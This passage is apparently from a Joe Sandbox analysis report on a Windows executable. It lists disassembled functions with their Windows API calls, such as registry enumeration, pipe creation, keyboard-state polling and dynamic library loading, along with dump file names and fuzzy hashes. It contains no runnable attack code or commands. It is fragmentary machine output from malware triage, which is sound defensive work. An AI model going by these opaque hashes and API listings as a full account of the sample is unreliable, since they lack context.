                                                                                                                  • Part of subcall function 008E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E1D91
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00966461
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00966468
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0096647D
                                                                                                                • DestroyWindow.USER32(?), ref: 00966485
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: b4eecec29f615ef55f2b05f660feeabbbf119c6b516d0dbc97492b67a48d6775
                                                                                                                • Instruction ID: e529dc521282fa7738434fbe638a2aa3f54adef46c595f9be08e67dd8076336a
                                                                                                                • Opcode Fuzzy Hash: b4eecec29f615ef55f2b05f660feeabbbf119c6b516d0dbc97492b67a48d6775
                                                                                                                • Instruction Fuzzy Hash: 6721C071214205BFEF104F68EC94EBB77ADEF593A8F104629FA10931A0DB71DC41A760
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00946DBC
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00946DEF
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00946E01
                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00946E3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 5ea8a7c6e4c940966cd07f39e31de32caf31a80972554ecaf21f3490a5c18f16
                                                                                                                • Instruction ID: dbed9d4279d6988066244aa28fa2ac776b2897be82f5151395b8b05944d21668
                                                                                                                • Opcode Fuzzy Hash: 5ea8a7c6e4c940966cd07f39e31de32caf31a80972554ecaf21f3490a5c18f16
                                                                                                                • Instruction Fuzzy Hash: 6B2195F5A00209ABDB209F29DC45F9A7BF8EF86720F204A19FDA0D72D0D77099509B52
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00946E89
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00946EBB
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00946ECC
                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00946F06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: b1c244336e1a26e203530b600349dafc12b4753964fd46c6ea352d540f4e9684
                                                                                                                • Instruction ID: 633e5407f517498143887db9bd2189aacb457ab2520e46b470fee5837e7e0c1b
                                                                                                                • Opcode Fuzzy Hash: b1c244336e1a26e203530b600349dafc12b4753964fd46c6ea352d540f4e9684
                                                                                                                • Instruction Fuzzy Hash: C72190B96003059BDB209F69DC44EAB77E8EF47720F200A19F9E1D72D0E770A8648B52
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0094AC54
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0094ACA8
                                                                                                                • __swprintf.LIBCMT ref: 0094ACC1
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0096F910), ref: 0094ACFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                • Opcode ID: d92dcf3c782abed1cb375372d690181228aee7f3695a1e11c4290a084c32c23a
                                                                                                                • Instruction ID: 9e7056e658b29369146133a366c07232b58eebfaea2e75fe97c69d149c5efc27
                                                                                                                • Opcode Fuzzy Hash: d92dcf3c782abed1cb375372d690181228aee7f3695a1e11c4290a084c32c23a
                                                                                                                • Instruction Fuzzy Hash: B8218330A00109AFCB10DF69D985EEE7BB8FF8A314B004079F909DB251DB71EA41DB21
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00941B19
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                • API String ID: 3964851224-769500911
                                                                                                                • Opcode ID: c16039bd22dd53a737e79a3f7db64e4b2a1f2266971fc28612f7fef5824611a7
                                                                                                                • Instruction ID: a5e95fb53b4b72ae2e3b30df38f338177acf0dd1dd9c92d1554a066f278c38e5
                                                                                                                • Opcode Fuzzy Hash: c16039bd22dd53a737e79a3f7db64e4b2a1f2266971fc28612f7fef5824611a7
                                                                                                                • Instruction Fuzzy Hash: 09116130910249CFCF00EFA8D855AFEB7B4FF66304F1044A9E815A7696EB329D0ACB51
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0095EC07
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0095EC37
                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0095ED6A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0095EDEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364364464-0
                                                                                                                • Opcode ID: 15d2a67de5a50b797269df43fcde02ff23eee5efaf0c623cb91afd87ad0a4b7f
                                                                                                                • Instruction ID: 8dfb5ebf5df96e11d6aa968427566a4af6bdc79a31cfbe733a328287554e9de6
                                                                                                                • Opcode Fuzzy Hash: 15d2a67de5a50b797269df43fcde02ff23eee5efaf0c623cb91afd87ad0a4b7f
                                                                                                                • Instruction Fuzzy Hash: 75817F71604310AFD764EF2AC846F2AB7E5FF45710F04882DF999DB2D2D6B1AD448B42
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009600FD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096013C
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00960183
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 009601AF
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009601BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440857362-0
                                                                                                                • Opcode ID: b33ffa8b565d2d5950ebf1cccd2cef37bbb1375693ad954cb1a07dd223d5fb4b
                                                                                                                • Instruction ID: 6a891d2e8bc193e6ac598eb0fe0a666c312bece8c7a2aaa8fa85ee56d2e63d9f
                                                                                                                • Opcode Fuzzy Hash: b33ffa8b565d2d5950ebf1cccd2cef37bbb1375693ad954cb1a07dd223d5fb4b
                                                                                                                • Instruction Fuzzy Hash: BD515B71208244AFD704EF58D881F6BB7E9FF85314F40892DF596872A2DB71E904DB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0095D927
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0095D9AA
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095D9C6
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0095DA07
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0095DA21
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947896,?,?,00000000), ref: 008E5A2C
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947896,?,?,00000000,?,?), ref: 008E5A50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327935632-0
                                                                                                                • Opcode ID: ea0d8a6db920c017e9adf6534dc6ef5981ec4c8bae69661d4754f7da396f9167
                                                                                                                • Instruction ID: 2116c7a2b83974ae0682450b0d493a52f132d6c51c42394a272d65e82bb5208c
                                                                                                                • Opcode Fuzzy Hash: ea0d8a6db920c017e9adf6534dc6ef5981ec4c8bae69661d4754f7da396f9167
                                                                                                                • Instruction Fuzzy Hash: 7C517835A05209DFCB10EFA9D4949ADB7F8FF0A324B048069E859AB322D770ED45CF81
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0094E61F
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0094E648
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0094E687
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0094E6AC
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0094E6B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1389676194-0
                                                                                                                • Opcode ID: 32d0c0055bac97a5ad9cc83f76e9b9688e86ba28a1c63ba064ad1b867807482d
                                                                                                                • Instruction ID: 9cac282d0193c01c37776bdc8dab423737082b0ab04b5391716a5a10e5058542
                                                                                                                • Opcode Fuzzy Hash: 32d0c0055bac97a5ad9cc83f76e9b9688e86ba28a1c63ba064ad1b867807482d
                                                                                                                • Instruction Fuzzy Hash: 12511735A00215AFCB00EF69C981AADBBF5FF49314F1480A9E859AB362CB71ED10DB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a46f6f6d92372ea6b3ba3fe8dac4fde811bc1e3a3349529330008985514185a
                                                                                                                • Instruction ID: 4cb4f0ac54411c82077ad80f43322803260038bb75c76e16743f227c2a4ac7d2
                                                                                                                • Opcode Fuzzy Hash: 9a46f6f6d92372ea6b3ba3fe8dac4fde811bc1e3a3349529330008985514185a
                                                                                                                • Instruction Fuzzy Hash: 0E41C33590C104AFD720DF28DC58FA9BBA8EB0B360F160565F916B72E1CB74AD41EE91
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 008E2357
                                                                                                                • ScreenToClient.USER32(009A57B0,?), ref: 008E2374
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 008E2399
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 008E23A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: 1c8b0314474941a6f74b3208da5c4a75f04a43a6ec4851f889a6ec11cff6bdbe
                                                                                                                • Instruction ID: faf3744c22f310fa2396e6f82b68f5a407b9c2fb1c2318ea5b2fd0b53d3d3012
                                                                                                                • Opcode Fuzzy Hash: 1c8b0314474941a6f74b3208da5c4a75f04a43a6ec4851f889a6ec11cff6bdbe
                                                                                                                • Instruction Fuzzy Hash: 9E417175608109FBCF159F69CC44AE9BB79FB06364F20435AF829D22A0C7349D90DF91
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009363E7
                                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00936433
                                                                                                                • TranslateMessage.USER32(?), ref: 0093645C
                                                                                                                • DispatchMessageW.USER32(?), ref: 00936466
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00936475
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 2108273632-0
                                                                                                                • Opcode ID: ceed11d707b1ef744e90ef02491a9fbedd58b928586baf566ca61484671fad61
                                                                                                                • Instruction ID: e342415079258badcff1e0f8795f2711fb117f5f6506843c211aae5288ad0233
                                                                                                                • Opcode Fuzzy Hash: ceed11d707b1ef744e90ef02491a9fbedd58b928586baf566ca61484671fad61
                                                                                                                • Instruction Fuzzy Hash: CF31A431A18646BFDB248F74DC48BB67BACAF02300F158569E821C31B1E7659855EFA0
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00938A30
                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00938ADA
                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00938AE2
                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00938AF0
                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00938AF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: 76529b6c58e383e4e1efbed7ec3a6a069a7b442b4c463a8d22338960b488302b
                                                                                                                • Instruction ID: 0fa4ed7f11f80aae07f6ab2956ed6ddca4d980604af31c7db6673dff6a41deac
                                                                                                                • Opcode Fuzzy Hash: 76529b6c58e383e4e1efbed7ec3a6a069a7b442b4c463a8d22338960b488302b
                                                                                                                • Instruction Fuzzy Hash: 7131BC71504219EBDF14CFA8D94CA9F7BB9EB05315F10862AF925EA2D0C7B09914DF90
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 0093B204
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0093B221
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0093B259
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0093B27F
                                                                                                                • _wcsstr.LIBCMT ref: 0093B289
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902887630-0
                                                                                                                • Opcode ID: 90e9a9a8379c38f24c80d37db49c42f8d78e5d5619e182f5d35670f45ecc1beb
                                                                                                                • Instruction ID: 4bd5749aa303441e96e3a757021e268cf82d0ef2996aae78bb54c2a0a41a3536
                                                                                                                • Opcode Fuzzy Hash: 90e9a9a8379c38f24c80d37db49c42f8d78e5d5619e182f5d35670f45ecc1beb
                                                                                                                • Instruction Fuzzy Hash: A321F532608204BAEB159B75DC09F7F7B9CDF99720F10422DF919DA1A1EFA5DC409AA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096B192
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0096B1B7
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0096B1CF
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0096B1F8
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00950E90,00000000), ref: 0096B216
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2294984445-0
                                                                                                                • Opcode ID: 4ad94a914d0d296497b3c43f4fd047da0501b9523262c3baab697820cff82d5e
                                                                                                                • Instruction ID: fd10e5586036b118d4e996dfedf576268ca5cad3859dece23632e822f450efa8
